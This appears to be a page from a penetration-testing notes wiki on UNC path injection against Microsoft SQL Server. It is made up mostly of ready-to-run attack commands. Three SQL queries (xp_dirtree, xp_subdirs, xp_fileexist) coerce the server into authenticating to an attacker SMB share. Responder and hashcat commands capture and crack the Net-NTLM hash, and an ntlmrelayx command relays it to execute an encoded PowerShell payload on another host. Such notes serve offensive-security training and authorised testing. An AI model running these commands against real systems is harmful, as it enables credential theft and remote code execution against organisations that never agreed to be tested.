UNC Path Injection

Overview

This attack takes advantage of the xp_dirtree procefure to force an SQL server to connect to a SMB share that the attacker controls, allow the attacker to capture the Net-NTLM hash of the SQL account to be cracked offline or relayed.

Examples

xp_dirtree

The following SQL query can be used:

EXEC master..xp_dirtree \"\\\\192.168.119.120\\\\test\";

xp_subdirs

The following SQL query can be used:

EXEC master..xp_subdirs\"\\\\192.168.119.120\\\\test\";

xp_fileexist

The following SQL query can be used:

EXEC master..xp_fileexist\"\\\\192.168.119.120\\\\test\";

Capturing\Relaying the Net-NTLM

Using responder to capture the Net-NTLM hash

sudo responder -I tap0

# hashcat command to crack the hash
hashcat -m 5600 hash.txt dict.txt --force

Relaying the Net-NTLM hash

SMB signing needs to be disabled to perform this attack.

sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.120.6 -c 'powershell -enc <base64 encoded payload>'

PreviousEnumeration NextPrivilege Escalation

Last updated 2 years ago